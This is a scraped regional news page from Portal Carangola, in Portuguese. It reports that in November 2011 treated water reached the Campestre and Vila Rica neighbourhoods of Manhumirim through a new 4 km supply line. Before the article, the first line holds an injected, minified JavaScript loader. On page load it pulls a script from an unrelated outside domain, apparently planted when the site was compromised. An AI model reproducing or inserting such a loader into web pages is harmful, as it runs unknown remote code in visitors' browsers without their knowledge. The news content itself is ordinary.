;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhumirim - Campestre e Vila Rica já estão recebendo água tratada. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhumirim – Campestre e Vila Rica já estão recebendo água tratada.

Onze de Novembro de dois mil e onze (11/11/2011), data que entra definitivamente para a história de Manhumirim. Nesse dia, mais precisamente às 09 horas e 15 minutos da manhã, a prefeitura de Manhumirim deu mais um passo importante na busca de algo que sempre foi defendido pelo prefeito municipal, Ronaldo Lopes, levar água de qualidade e em quantidade a todos os moradores da cidade. Foi aberto, ainda que em período de testes, o registro, liberando a água tratada do reservatório José Luiz Cantamissa, para abastecer os moradores dos bairros, Campestre e Vila Rica.

A Prefeitura de Manhumirim e o SAAE trabalharam visando realizar  a  construção de 04 quilômetros de rede de adução de água do reservatório José Luiz Cantamissa até os bairros Campestre e Vila Rica, passando pelo asfalto do contorno,  atendendo também as ruas,  Jorge Caetano dos Santos e Orfano Gonzaga.  A tubulação foi feita, e a prefeitura e o SAAE esperam ter resolvido de vez o problema de abastecimento nos bairros citados, sendo abastecidos em quantidade suficiente e com a qualidade exigida. Durante anos os moradores sofreram com a falta, e a qualidade ruim do líquido que é a fonte da vida.

 O Prefeito Ronaldo Lopes, assim como o diretor do SAAE, Luciano Borchio estão contentes por poder realizar mais uma grande obra em prol da população. Foram gastos cerca de R$ 200.000.00 (duzentos mil reais), sendo recursos próprios da Prefeitura e do próprio SAAE.

Valdir Vieira – Assessoria de Comunicação – Prefeitura de Manhumirim.

 


Ofertas


Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.